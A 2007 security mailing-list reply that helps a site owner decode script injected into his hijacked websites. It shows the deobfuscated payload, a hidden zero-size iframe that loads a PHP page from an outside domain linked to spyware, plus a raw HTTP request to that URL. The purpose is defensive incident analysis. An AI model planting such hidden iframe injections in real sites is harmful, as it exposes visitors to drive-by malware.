[Dshield] need help decoding.

Darren Spruell phatbuckett at gmail.com
Wed Sep 19 03:13:31 GMT 2007


On 9/18/07, Dan Jackson <kybowhunter515 at yahoo.com> wrote:
> Recently several of my sites got hijacked and below is the code that
> was inserted, what I'm trying to do is to decode it to figure out what
> it's intent was and to see if it opened up any other holes in the
> server that I need to know about.
>
>
>
> Maybe this is easy stuff... but I don't have a clue where to start ...

I deobfuscate most things with Spidermonkey, a JS engine that can be
run from the command line. Running yours through comes back with this:

</textatea></textarea><IFRAME
src="http://marcobernardoni.com/x/index.php" width=3 height=3
style="display:none"></IFRAME>

...which looks to be an iframe injection pulling from the URL you see.

Retrieving that file (/x/index.php) from the site comes back with a
single '0', which I'm not sure means what exactly.

Connected to marcobernardoni.com.
Escape character is '^]'.
GET /x/index.php HTTP/1.1
Host: marcobernardoni.com

HTTP/1.1 200 OK
Date: Tue, 18 Sep 2007 13:44:38 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.7
mod_perl/1.29 FrontPage/5.0.2.2510
X-Powered-By: PHP/4.4.7
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
X-Pad: avoid browser bug

0

Connection closed by foreign host.


It's interesting to note that http://marcobernardoni.com/ is the "this
site isn't here yet" message from the hoster, but the site does have
content on it (the PHP referenced in the iframe.) The site is also
referenced several times in the context of spyware hosting:

http://www.google.com/search?hl=en&hs=II&q=marcobernardoni.com+iframe&btnG=Search

Others can fill in the gaps... ;)

DS


More information about the list mailing list